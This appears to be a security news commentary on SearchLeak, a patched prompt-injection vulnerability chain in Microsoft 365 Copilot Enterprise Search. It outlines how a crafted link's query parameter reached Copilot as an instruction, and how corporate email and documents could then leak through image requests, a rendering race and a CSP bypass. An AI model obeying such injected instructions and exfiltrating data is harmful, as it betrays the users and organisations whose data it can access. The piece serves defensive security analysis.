SearchLeak shows why prompt injection hurts more in enterprise AI than in chat

Varonis researchers disclosed SearchLeak, a vulnerability chain in Microsoft 365 Copilot Enterprise Search that Microsoft fixed as CVE-2026-42824. Public reports describe a combination of Parameter-to-Prompt injection, an HTML rendering race condition and a Content Security Policy bypass through Bing image search infrastructure.

One link could trigger a search across corporate data

The attack was ugly because it used Copilot’s intended strength. A victim clicked a crafted link and the query parameter reached Copilot as an instruction. Copilot could then search data the user was allowed to access, including email, calendar, OneDrive and SharePoint.

Reports say sensitive content could be exfiltrated through image requests before output sanitization fully stopped the response. Microsoft fixed the issue server-side before public disclosure, so available reports say administrators did not need to deploy a client update.

Copilot inherited the user’s permissions and therefore the user’s risk

In a normal chatbot, prompt injection is often embarrassing but contained. In Microsoft 365 Copilot, the same class of bug matters more because the model sits above a corporate index. Access to email, documents and calendar is exactly why the product is useful. It is also why a bug quickly becomes an incident.

For security teams, the practical lesson is clear: an AI assistant connected to data needs the same treatment as a highly privileged internal application. Auditing the model is not enough. Teams have to audit data flow, output rendering, permissions, logs and exfiltration paths through channels that look harmless.

Patching one CVE does not remove the attack class

SearchLeak is patched, but similar scenarios will return. Prompt injection is hard to filter with blacklists because malicious intent can be rephrased endlessly. Add a web flaw or a rendering race and the LLM problem immediately becomes a classic application-security problem.

This is where the word “assistant” becomes misleading. The product behaves like a layer above corporate memory, so it needs defenses against outside text telling it what to pull from that memory.

The decisive signals are permission boundaries and escape routes

Watch whether Microsoft and other enterprise AI vendors publish more detailed security architecture: how they separate instructions from data, how they test prompt injection, how they restrict output channels and how quickly they can disable risky integrations.

The second signal will come from customers. If Copilot and similar tools are deployed without a separate threat model, the next incident will not be surprising. It will be the bill for convenience.

Lilith's verdict

Copilot with email access is an intern holding a universal office badge. Useful, maybe, but doors should open by policy, not because a sentence in a stranger’s link asked nicely.